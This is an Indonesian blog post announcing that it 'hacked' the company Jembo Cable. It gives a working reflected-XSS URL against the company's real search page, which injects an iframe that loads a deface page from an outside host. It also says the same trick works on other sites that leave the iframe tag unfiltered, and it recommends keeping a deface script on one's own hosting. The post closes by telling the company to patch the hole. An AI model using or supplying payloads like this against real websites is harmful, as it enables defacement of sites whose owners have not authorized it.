Jembo Cable hacked
Entah kenapa pihak Jembo Cable tidak memperbaiki vuln XSS yang mereka punya, sampai saya memikirkan hal gila ini :D
http://www.jembo.co.id/search.php?cat=newsevent&q=%3Ciframe%20src=%22http://nama-saya.000webhostapp.com/sometime.html%22%20width=%22800%22%20height=%22800%22%3E%3C/iframe%3E
Bisa work di beberapa website yang masih vuln XSS (dengan catatan: tag <iframe> tidak difilter)
dan punya script deface yang ditempatin di hostingan kalian (pegel dong kalo ngetikin scriptnya di url 0_o)
Cuma segini yang bisa saya tulis, untuk pihak Jembo Cable: cepet cepet perbaikin websitenya sebelum ada yang beneran deface website kalian
0 Tanggapan:
Post a Comment